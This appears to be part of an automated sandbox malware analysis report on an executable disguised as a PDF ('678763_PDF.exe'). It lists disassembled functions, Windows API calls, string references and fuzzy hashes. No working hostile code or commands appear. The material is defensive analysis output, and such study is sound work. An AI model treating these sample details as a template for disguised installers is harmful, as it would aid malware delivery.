                                                                                                                                                                                      • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                                                                                    • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                                                                                                                    • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\678763_PDF.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                                                                                                                    • CharNextW.USER32(?,"C:\Users\user\Desktop\678763_PDF.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                                                                                                                    • CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • *?|<>/":, xrefs: 00406857
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00406806
                                                                                                                                                                                    • "C:\Users\user\Desktop\678763_PDF.exe", xrefs: 00406849
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\678763_PDF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 589700163-2613972342
                                                                                                                                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                    • Instruction ID: fa9c0ef9ae643832d728fa0671e6943ea0b093c18f887e6db6f7fe1f852dcfd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                                    • Instruction Fuzzy Hash: F111932780221299DB303B148C40E7766E8AF54794F52C43FED8A722C0F77C4C9286AD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00404598
                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004045B0
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004045C3
                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 004045D3
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004045ED
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                    • Instruction ID: 069c4eaec478219780f05c004fc5973679282d3c2eb16bc8cec9dcb23997e36d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 592151B1500704ABCB20DF68DE08A5B7BF8AF41714B05892EEA96A22E0D739E944CF54
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1
                                                                                                                                                                                      • Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E
                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                                                                    • Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                                                    • Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
                                                                                                                                                                                    • Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404EAC
                                                                                                                                                                                    • GetMessagePos.USER32 ref: 00404EB4
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404ECE
                                                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EE0
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F06
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                    • Instruction ID: eb967d7d92909976ed67768bbc6bf91133f1097352fa1b537f2083fc5134d3bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB019E71900219BADB00DB94DD81FFEBBBCAF95710F10412BFB11B61C0C7B4AA018BA4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB6
                                                                                                                                                                                    • MulDiv.KERNEL32(000ADBE7,00000064,000ADBEB), ref: 00402FE1
                                                                                                                                                                                    • wsprintfW.USER32 ref: 00402FF1
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402FEB
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                    • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                                                    • Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667972263-0
                                                                                                                                                                                    • Opcode ID: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                                                                                                                    • Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 67fe96262b9617a6657bb77028f4b0069242132a66e071a854657c6cce135934
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseEnum$DeleteValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1354259210-0
                                                                                                                                                                                    • Opcode ID: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
                                                                                                                                                                                    • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                                                                                                                                                    • Opcode Fuzzy Hash: d4675444f2d34e761c1d250a7f981306a9f7540a76c819169e3a9c2f75ea5dca
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                                                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1849352358-0
                                                                                                                                                                                    • Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                                                    • Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(?), ref: 00401E56
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                                                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1724662036.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1724631304.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724676246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1724701743.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1725588945.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_678763_PDF.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3808545654-0
                                                                                                                                                                                    • Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                                                    • Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
